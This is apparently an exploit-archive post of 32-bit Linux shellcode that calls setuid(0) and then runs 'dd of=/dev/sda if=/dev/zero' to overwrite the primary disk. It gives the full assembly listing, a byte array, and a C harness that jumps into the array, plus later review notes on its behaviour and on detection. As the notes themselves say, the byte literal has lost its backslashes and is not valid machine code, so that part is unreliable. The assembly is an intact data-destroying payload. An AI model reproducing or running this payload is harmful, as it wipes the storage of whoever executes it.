[linux/x86] - linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes
Posted on 23 September 2010
======================================================================
linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes
======================================================================

/*
 * Title : Linux x86 shellcode setuid(0) and dd of=/dev/sda if=/dev/zero, 74 bytes
 * Author : xertux
 * Platform: Linux X86 (7.04)
 * Description : setuid(0) + dd of=/dev/sda if=/dev/zero
 * Size : 74 bytes
 * Decription : Use the dd command, we can change of and if argument to create, modify and destroy datas. Here the sda disk is format.
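* */

/**
 * Assembly listing (32-bit, int 0x80 system-call convention) that the byte
 * array below encodes, one instruction per line.
 *
 * BITS 32
 * ;Get root privileges
 * xor eax, eax
 * xor ebx, ebx
 * xor ecx, ecx
 * cdq
 * mov al, 0x17
 * int 0x80
 * ;execve(dd of=/dev/sda if=/dev/zero)
 * xor eax, eax       ; eax becomes 0
 * push eax           ; null string termination
 * push 0x64642f2f    ; push //dd
 * push 0x6e69622f    ; push /bin
 * mov ebx, esp       ; put the address of "/bin//dd" into ebx
 * push eax           ; push null string termination
 * push 0x6164732f    ; push /sda
 * push 0x2f766564    ; push dev/
 * push 0x2f3d666f    ; push of=/
 * mov ecx, esp       ; put the address of "of=/dev//sda" into ecx ==> you can change to another disk or any files
 * push eax           ; null string termination
 * push 0x6f72657a    ; push zero
 * push 0x2f766564    ; push dev/
 * push 0x2f3d6669    ; push if=/
 * mov edx, esp       ; put the address of "if=/dev/zero" into edx ==> you can try with /dev/random, it's funny ^^
 * push eax           ; push null args termination
 * push edx           ; push "if=/dev/zero"
 * push ecx           ; push "of=/dev//sda"
 * push ebx           ; push /bin//dd
 * mov ecx, esp       ; argument array completed via esp
 * xor edx, edx
 * mov al, 0x0b       ; put the int execve call into al
 * int 0x80           ; system call
 */

/*
 * Review notes (harness and payload behaviour, as far as the listing shows):
 *
 * - The listing issues two i386 system calls through int 0x80: 0x17
 *   (setuid, with ebx = 0) and 0x0b (execve). The execve arguments built on
 *   the stack are path "/bin//dd", argv { "/bin//dd", "of=/dev//sda",
 *   "if=/dev/zero", NULL } and a NULL environment (edx is zeroed).
 * - The setuid return value is never checked. setuid(0) only succeeds for a
 *   process that is already entitled to it (effective or saved UID 0, or
 *   CAP_SETUID); otherwise dd starts as the current user and its open of the
 *   block device for writing is subject to the normal device-node
 *   permissions.
 * - The doubled slashes pad each string to a multiple of four bytes. For
 *   detection this means process-execution rules should canonicalise paths
 *   and key on "dd with an of= argument that resolves to a block device"
 *   (plus the empty environment and an unusual parent process) rather than
 *   on the literal strings "/bin/dd" or "/dev/sda".
 * - shellcode[] is an ordinary writable data object. Calling it converts an
 *   object pointer to a function pointer, which ISO C does not define, and on
 *   systems that enforce non-executable data pages the call faults before
 *   any payload instruction runs.
 * - strlen() is a valid length measure here only because the encoded payload
 *   contains no 0x00 byte.
 * - NOTE(review): the literal below is kept exactly as the page renders it.
 *   In that form it is ASCII text, not the 74 machine-code bytes of the
 *   listing, so the printed length will not be 74.
 */

#include <stdio.h>
#include <string.h> /* strlen() was called without a declaration */

/* Payload specimen, reproduced verbatim from the page (see NOTE above). */
char shellcode[] =
    "x31xc0x31xdbx31xc9x99xb0x17xcdx80x31xc0x50x68x2f"
    "x2fx64x64x68x2fx62x69x6ex89xe3x50x68x2fx73x64x61"
    "x68x64x65x76x2fx68x6fx66x3dx2fx89xe1x50x68x7ax65"
    "x72x6fx68x64x65x76x2fx68x69x66x3dx2fx89xe2x50x52"
    "x51x53x89xe1x31xd2xb0x0bxcdx80";

/*
 * Test harness: prints the length of the array, then transfers control to
 * it. If the payload's execve succeeds the process image is replaced, so
 * the return statement is reached only when the call itself returns.
 */
int main(void)
{
    /* strlen() yields size_t, so the conversion must be %zu, not %d. */
    printf(" [*] Shellcode - length: %zu ", strlen(shellcode));

    /* Indirect call into the data array; see the review notes above. */
    (*(void(*)()) shellcode)();

    return 0;
}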